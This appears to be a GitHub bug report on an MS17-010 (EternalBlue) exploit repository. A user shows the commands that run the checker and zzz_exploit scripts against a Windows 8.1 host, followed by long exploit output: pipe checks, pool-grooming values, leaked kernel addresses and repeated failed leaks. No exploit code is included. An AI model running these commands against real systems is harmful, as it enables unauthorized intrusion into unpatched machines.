worawit / MS17-010

Windows 8.1 Unexpected Alignment Error #12

Open cclements opened 7 years ago

cclements commented 7 years ago

Targeting Windows 8.1 x64 using the guest user account:

python2 checker.py 192.168.10.1
Target OS: Windows 8.1 Connected 9600
The target is not patched

=== Testing named pipes ===
spoolss: Ok (64 bit)
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
python2 zzz_exploit.py 192.168.10.1 spoolss
Target OS: Windows 8.1 Connected 9600
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00208c9a098
InParam: 0xffffc00205e7c16c
MID: 0x1706
unexpected alignment, diff: 0x2e1d098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206410048
InParam: 0xffffc0020627116c
MID: 0x1701
unexpected alignment, diff: 0x19e048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc002064a6098
InParam: 0xffffc0020641d16c
MID: 0x1709
unexpected alignment, diff: 0x88098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc0020649b048
InParam: 0xffffc002064eb16c
MID: 0x170a
unexpected alignment, diff: 0x-50fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206643048
InParam: 0xffffc002065ef16c
MID: 0x1802
unexpected alignment, diff: 0x53048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001ff17f048
InParam: 0xffffc0020664916c
MID: 0x1802
unexpected alignment, diff: 0x-74cafb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206630048
InParam: 0xffffc0020679216c
MID: 0x1802
unexpected alignment, diff: 0x-162fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00205f41048
InParam: 0xffffc002067c416c
MID: 0x190a
unexpected alignment, diff: 0x-883fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fc1f5048
InParam: 0xffffc002068d916c
MID: 0x1902
unexpected alignment, diff: 0x-a6e4fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fe187098
InParam: 0xffffc0020691e16c
MID: 0x190a
unexpected alignment, diff: 0x-8797f68
leak failed... try again
Done